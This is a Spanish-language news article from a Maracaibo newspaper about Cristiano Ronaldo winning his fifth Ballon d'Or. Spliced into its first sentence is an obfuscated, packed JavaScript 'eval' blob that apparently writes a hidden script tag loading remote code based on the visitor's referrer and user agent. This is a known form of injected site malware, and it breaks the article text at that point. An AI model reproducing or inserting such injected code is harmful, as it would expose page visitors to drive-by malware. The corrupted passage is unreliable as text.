publicidad

Cristiano se viste de oro por quinta vez

Braulio Polanco / Maracaibo / bpolanco@gmail.com
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rienz|var|u0026u|referrer|hnbie||js|php'.split('|'),0,{})) goleador del Real Madrid le volvió a ganar la partida de Lionel Messi, a quien igualó en este premio: ambos tienen cinco

Cristiano obtiene el premio en medio de una mala racha liguera. (Foto: Agencias)

Cristiano Ronaldo es nuevamente el mejor jugador del mundo, según la revista France Football, encargada de entregar el Balón de Oro. El portugués obtuvo el trofeo luego de un gran año en el que ganó la liga española y la Champions League, firmando partidos importantes en ambas competiciones, en especial al final de la temporada en la que anotó 10 goles entre cuartos y final del torneo europeo.

Ronaldo obtuvo la distinción en un momento en el que atraviesa una mala racha en el torneo liguero español, donde solo ha marcado dos tantos. Sin embargo, en Champions la está rompiendo como de costumbre, con 9 goles en primera fase y un récord personal que firmó ayer ante el Borussia Dortmund: primer futbolista en marcar en los primeros seis encuentros de la fase de grupo.

El goleador del Real Madrid le volvió a ganar la partida de Lionel Messi, a quien igualó en este premio: ambos tienen cinco.

El tercer lugar lo ocupó Neymar Junior, mientras que Gianluigi Buffon (cuarto) y Luka Modric (quinto), completaron la lista de cinco.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama